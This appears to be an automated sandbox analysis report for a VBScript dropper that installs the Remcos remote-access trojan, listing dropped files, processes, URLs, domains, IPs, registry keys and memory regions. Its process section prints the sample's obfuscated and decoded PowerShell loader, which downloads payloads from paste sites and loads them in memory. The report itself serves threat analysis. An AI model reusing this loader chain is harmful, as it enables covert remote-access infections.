Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
asegurar.vbs
|
Unicode text, UTF-16, little-endian text, with very long lines (302), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iejrq5or.0gb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_led4k1bt.bdd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mipky4am.ds4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouoftpk4.jyi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qz50m0am.a4n.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvv3jrxo.ax3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\dll01.txt
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek
= [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek
= $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm
= 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm
-OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() +
'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content
-Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String(
$QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null,
[object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda'
));"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 127.0.0.1
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA
-inputFormat xml -outputFormat text
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://pastebin.com/raw
|
unknown
|
|
|
|
https://paste.ee/d/Rrk2f/0
|
188.114.97.3
|
|
|
|
https://www.google.com;
|
unknown
|
|
|
|
https://pastebin.com/raw/J6uRjZrv
|
104.20.3.235
|
|
|
|
https://analytics.paste.ee
|
unknown
|
|
|
|
https://www.google.com
|
unknown
|
|
|
|
https://analytics.paste.ee;
|
unknown
|
|
|
|
https://cdnjs.cloudflare.com
|
unknown
|
|
|
|
sost.duckdns.org
|
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
|
|
|
https://pastebin.com
|
unknown
|
|
|
|
https://secure.gravatar.com
|
unknown
|
|
|
|
https://themes.googleusercontent.com
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://rentry.org/vsm4ofxs/raw
|
164.132.58.105
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://rentry.org
|
unknown
|
||
|
https://rentry.org/shqm6g9p/rawP
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
unknown
|
||
|
http://rentry.org
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
HTTPS://PASTE.EE/D/RRK2F/0
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://rentry.org/vsm4ofxs/rawp
|
unknown
|
||
|
https://rentry.org/shqm6g9p/raw
|
164.132.58.105
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.apache.o
|
unknown
|
||
|
https://pastebin.com/raw/4B83LcVU
|
104.20.3.235
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://pastebin.com
|
unknown
|
There are 29 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
sost.duckdns.org
|
181.236.112.169
|
|
|
|
pastebin.com
|
104.20.3.235
|
|
|
|
rentry.org
|
164.132.58.105
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.20.3.235
|
pastebin.com
|
United States
|
|
|
|
181.236.112.169
|
sost.duckdns.org
|
Colombia
|
|
|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
164.132.58.105
|
rentry.org
|
France
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-T0UVJ0
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-T0UVJ0
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-T0UVJ0
|
time
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2C1E000
|
stack
|
page read and write
|
|
|
|
F38000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
26035520000
|
trusted library allocation
|
page read and write
|
|
|
|
26035581000
|
trusted library allocation
|
page read and write
|
|
|
|
22388E20000
|
trusted library allocation
|
page read and write
|
||
|
2602723C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B936000
|
trusted library allocation
|
page execute and read and write
|
||
|
26027240000
|
trusted library allocation
|
page read and write
|
||
|
201EA506000
|
heap
|
page read and write
|
||
|
2603DA28000
|
heap
|
page read and write
|
||
|
7DF45DAF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D8F000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page execute and read and write
|
||
|
26025ADB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
22389065000
|
heap
|
page read and write
|
||
|
2974E3EA000
|
heap
|
page read and write
|
||
|
2CB9FE92000
|
heap
|
page read and write
|
||
|
26035511000
|
trusted library allocation
|
page read and write
|
||
|
2603DCE0000
|
heap
|
page read and write
|
||
|
7FFD9B90C000
|
trusted library allocation
|
page execute and read and write
|
||
|
26025450000
|
trusted library allocation
|
page read and write
|
||
|
BEC2EFF000
|
unkown
|
page read and write
|
||
|
318E000
|
stack
|
page read and write
|
||
|
2CBA3883000
|
heap
|
page read and write
|
||
|
2468DF39000
|
heap
|
page read and write
|
||
|
26026B4D000
|
trusted library allocation
|
page read and write
|
||
|
201E8260000
|
heap
|
page read and write
|
||
|
947D1FE000
|
stack
|
page read and write
|
||
|
DB597F9000
|
stack
|
page read and write
|
||
|
201EA27C000
|
heap
|
page read and write
|
||
|
2238A91A000
|
trusted library allocation
|
page read and write
|
||
|
201EA266000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
20180C2D000
|
trusted library allocation
|
page read and write
|
||
|
201EA444000
|
heap
|
page read and write
|
||
|
223A2CF9000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
D9D89FF000
|
stack
|
page read and write
|
||
|
26026EE9000
|
trusted library allocation
|
page read and write
|
||
|
2CBA46F9000
|
heap
|
page read and write
|
||
|
26026B5A000
|
trusted library allocation
|
page read and write
|
||
|
26025BAC000
|
trusted library allocation
|
page read and write
|
||
|
2238ACCE000
|
trusted library allocation
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
260258D4000
|
trusted library allocation
|
page read and write
|
||
|
2238A8AB000
|
trusted library allocation
|
page read and write
|
||
|
2239A820000
|
trusted library allocation
|
page read and write
|
||
|
201E84A0000
|
trusted library allocation
|
page read and write
|
||
|
DB5983E000
|
stack
|
page read and write
|
||
|
2CB9FE60000
|
heap
|
page read and write
|
||
|
D9D8DFE000
|
stack
|
page read and write
|
||
|
26023AEE000
|
heap
|
page read and write
|
||
|
DB5993B000
|
stack
|
page read and write
|
||
|
2238AE6C000
|
trusted library allocation
|
page read and write
|
||
|
7D18B0C000
|
stack
|
page read and write
|
||
|
2238ABCC000
|
trusted library allocation
|
page read and write
|
||
|
BE5000
|
heap
|
page read and write
|
||
|
2CB9FEB0000
|
heap
|
page read and write
|
||
|
26023C55000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
2974E330000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
2CBA2A25000
|
heap
|
page read and write
|
||
|
22388E6F000
|
heap
|
page read and write
|
||
|
22388D40000
|
heap
|
page read and write
|
||
|
201EA334000
|
heap
|
page read and write
|
||
|
7D17C78000
|
stack
|
page read and write
|
||
|
2CB9FF02000
|
heap
|
page read and write
|
||
|
26025AD5000
|
trusted library allocation
|
page read and write
|
||
|
223A2FA6000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
7D17CFE000
|
stack
|
page read and write
|
||
|
26025482000
|
trusted library allocation
|
page read and write
|
||
|
6169D7E000
|
stack
|
page read and write
|
||
|
7D1797E000
|
stack
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FEDA000
|
heap
|
page read and write
|
||
|
201819E4000
|
trusted library allocation
|
page read and write
|
||
|
201E8312000
|
heap
|
page read and write
|
||
|
328F000
|
stack
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
20180001000
|
trusted library allocation
|
page read and write
|
||
|
2602716A000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FF2B000
|
heap
|
page read and write
|
||
|
1100000
|
heap
|
page read and write
|
||
|
201E8341000
|
heap
|
page read and write
|
||
|
2CBA00DB000
|
heap
|
page read and write
|
||
|
26023B16000
|
heap
|
page read and write
|
||
|
201E82E0000
|
trusted library allocation
|
page read and write
|
||
|
2974E350000
|
heap
|
page read and write
|
||
|
26026B34000
|
trusted library allocation
|
page read and write
|
||
|
6169CFE000
|
stack
|
page read and write
|
||
|
2CBA4E2A000
|
heap
|
page read and write
|
||
|
2CB9FF0B000
|
heap
|
page read and write
|
||
|
2018197A000
|
trusted library allocation
|
page read and write
|
||
|
201EA830000
|
heap
|
page read and write
|
||
|
2CBA5918000
|
heap
|
page read and write
|
||
|
22388E79000
|
heap
|
page read and write
|
||
|
2CB9FE87000
|
heap
|
page read and write
|
||
|
DB596FE000
|
stack
|
page read and write
|
||
|
2603DC69000
|
heap
|
page read and write
|
||
|
7D17DFE000
|
stack
|
page read and write
|
||
|
2603DB60000
|
heap
|
page read and write
|
||
|
223A2D55000
|
heap
|
page read and write
|
||
|
2603DE90000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
|
223A2F30000
|
heap
|
page execute and read and write
|
||
|
223A2F54000
|
heap
|
page read and write
|
||
|
7D17A7D000
|
stack
|
page read and write
|
||
|
260239F0000
|
heap
|
page read and write
|
||
|
2238A971000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBC2000
|
trusted library allocation
|
page read and write
|
||
|
260271BB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B892000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA14000
|
trusted library allocation
|
page read and write
|
||
|
2238ABF2000
|
trusted library allocation
|
page read and write
|
||
|
201EA2C1000
|
heap
|
page read and write
|
||
|
26025AC7000
|
trusted library allocation
|
page read and write
|
||
|
DB59B3E000
|
stack
|
page read and write
|
||
|
7FFD9BA11000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8AB000
|
trusted library allocation
|
page read and write
|
||
|
7D1752D000
|
stack
|
page read and write
|
||
|
22388E00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
2603DD0D000
|
heap
|
page read and write
|
||
|
26025A8A000
|
trusted library allocation
|
page read and write
|
||
|
2CBA1BC2000
|
heap
|
page read and write
|
||
|
2603DCD0000
|
heap
|
page read and write
|
||
|
22388E3A000
|
heap
|
page read and write
|
||
|
2CB9FEE8000
|
heap
|
page read and write
|
||
|
260258B7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D1787E000
|
stack
|
page read and write
|
||
|
26023A30000
|
heap
|
page read and write
|
||
|
2CBA00D9000
|
heap
|
page read and write
|
||
|
22388E8F000
|
heap
|
page read and write
|
||
|
2CBA46F4000
|
heap
|
page read and write
|
||
|
201E9D70000
|
heap
|
page execute and read and write
|
||
|
2CBA00DE000
|
heap
|
page read and write
|
||
|
26023BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
22389044000
|
heap
|
page read and write
|
||
|
2238AE6A000
|
trusted library allocation
|
page read and write
|
||
|
223A2F50000
|
heap
|
page read and write
|
||
|
616A33F000
|
stack
|
page read and write
|
||
|
26026B6D000
|
trusted library allocation
|
page read and write
|
||
|
2603D9B0000
|
trusted library section
|
page read and write
|
||
|
22388E77000
|
heap
|
page read and write
|
||
|
DB5A74E000
|
stack
|
page read and write
|
||
|
26023B63000
|
heap
|
page read and write
|
||
|
7D174A3000
|
stack
|
page read and write
|
||
|
2603D9EE000
|
heap
|
page read and write
|
||
|
201EA13D000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
2468DF30000
|
heap
|
page read and write
|
||
|
2238A9D8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
201E8220000
|
heap
|
page read and write
|
||
|
26025B14000
|
trusted library allocation
|
page read and write
|
||
|
616A4BB000
|
stack
|
page read and write
|
||
|
201E9DE0000
|
heap
|
page read and write
|
||
|
D9D839A000
|
stack
|
page read and write
|
||
|
26025B01000
|
trusted library allocation
|
page read and write
|
||
|
2603D9D0000
|
heap
|
page read and write
|
||
|
2018022D000
|
trusted library allocation
|
page read and write
|
||
|
2603DC7B000
|
heap
|
page read and write
|
||
|
7FFD9B906000
|
trusted library allocation
|
page read and write
|
||
|
26025AA6000
|
trusted library allocation
|
page read and write
|
||
|
DB598B7000
|
stack
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
20190010000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
7D17AF9000
|
stack
|
page read and write
|
||
|
7FFD9B853000
|
trusted library allocation
|
page execute and read and write
|
||
|
2238A934000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
2238A917000
|
trusted library allocation
|
page read and write
|
||
|
7D175AE000
|
stack
|
page read and write
|
||
|
26025B84000
|
trusted library allocation
|
page read and write
|
||
|
26023CA0000
|
heap
|
page read and write
|
||
|
20190001000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
201EA48A000
|
heap
|
page read and write
|
||
|
223A2D7B000
|
heap
|
page read and write
|
||
|
26026C17000
|
trusted library allocation
|
page read and write
|
||
|
201E8300000
|
heap
|
page read and write
|
||
|
26025B41000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FECE000
|
heap
|
page read and write
|
||
|
7FFD9B8AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
201EA257000
|
heap
|
page read and write
|
||
|
304E000
|
stack
|
page read and write
|
||
|
7D17BF9000
|
stack
|
page read and write
|
||
|
201E84A3000
|
trusted library allocation
|
page read and write
|
||
|
201EA272000
|
heap
|
page read and write
|
||
|
2238A923000
|
trusted library allocation
|
page read and write
|
||
|
201EA24E000
|
heap
|
page read and write
|
||
|
2603DD29000
|
heap
|
page read and write
|
||
|
22388F28000
|
heap
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
2C8B000
|
stack
|
page read and write
|
||
|
201EA360000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
7D1898E000
|
stack
|
page read and write
|
||
|
2CBA428D000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
22389040000
|
heap
|
page read and write
|
||
|
7FFD9B854000
|
trusted library allocation
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
7FFD9B91C000
|
trusted library allocation
|
page execute and read and write
|
||
|
223A2D4E000
|
heap
|
page read and write
|
||
|
2CB9FF3A000
|
heap
|
page read and write
|
||
|
2CB9FF02000
|
heap
|
page read and write
|
||
|
2CB9FF02000
|
heap
|
page read and write
|
||
|
2603DC8D000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
201E834B000
|
heap
|
page read and write
|
||
|
947D27E000
|
stack
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
2974E5B0000
|
heap
|
page read and write
|
||
|
2CBA3425000
|
heap
|
page read and write
|
||
|
26023C50000
|
heap
|
page read and write
|
||
|
7FFD9B893000
|
trusted library allocation
|
page execute and read and write
|
||
|
260258C4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
201E833F000
|
heap
|
page read and write
|
||
|
2603D513000
|
heap
|
page read and write
|
||
|
22388EBD000
|
heap
|
page read and write
|
||
|
2603D9C6000
|
heap
|
page execute and read and write
|
||
|
7FFD9BA72000
|
trusted library allocation
|
page read and write
|
||
|
26026F17000
|
trusted library allocation
|
page read and write
|
||
|
7D188CE000
|
stack
|
page read and write
|
||
|
2CBA4E11000
|
heap
|
page read and write
|
||
|
26025B49000
|
trusted library allocation
|
page read and write
|
||
|
2CBA4E28000
|
heap
|
page read and write
|
||
|
2CB9FE20000
|
heap
|
page read and write
|
||
|
7D17D7E000
|
stack
|
page read and write
|
||
|
2974E320000
|
heap
|
page read and write
|
||
|
26023ADA000
|
heap
|
page read and write
|
||
|
7FFD9B87C000
|
trusted library allocation
|
page read and write
|
||
|
2603DD4F000
|
heap
|
page read and write
|
||
|
2CBA25C2000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
201E9D67000
|
heap
|
page execute and read and write
|
||
|
D9D8CFD000
|
stack
|
page read and write
|
||
|
26026B42000
|
trusted library allocation
|
page read and write
|
||
|
26023B14000
|
heap
|
page read and write
|
||
|
2CB9FD20000
|
heap
|
page read and write
|
||
|
2CBA50F4000
|
heap
|
page read and write
|
||
|
947D17F000
|
stack
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
|
2468DE50000
|
heap
|
page read and write
|
||
|
2CB9FEE7000
|
heap
|
page read and write
|
||
|
201819C5000
|
trusted library allocation
|
page read and write
|
||
|
2CB9FF0B000
|
heap
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
223A2DB7000
|
heap
|
page execute and read and write
|
||
|
D9D8FFB000
|
stack
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CBA50F9000
|
heap
|
page read and write
|
||
|
DB59ABE000
|
stack
|
page read and write
|
||
|
2239A881000
|
trusted library allocation
|
page read and write
|
||
|
BEC2B7D000
|
stack
|
page read and write
|
||
|
D9D8AFF000
|
stack
|
page read and write
|
||
|
2CB9FECA000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
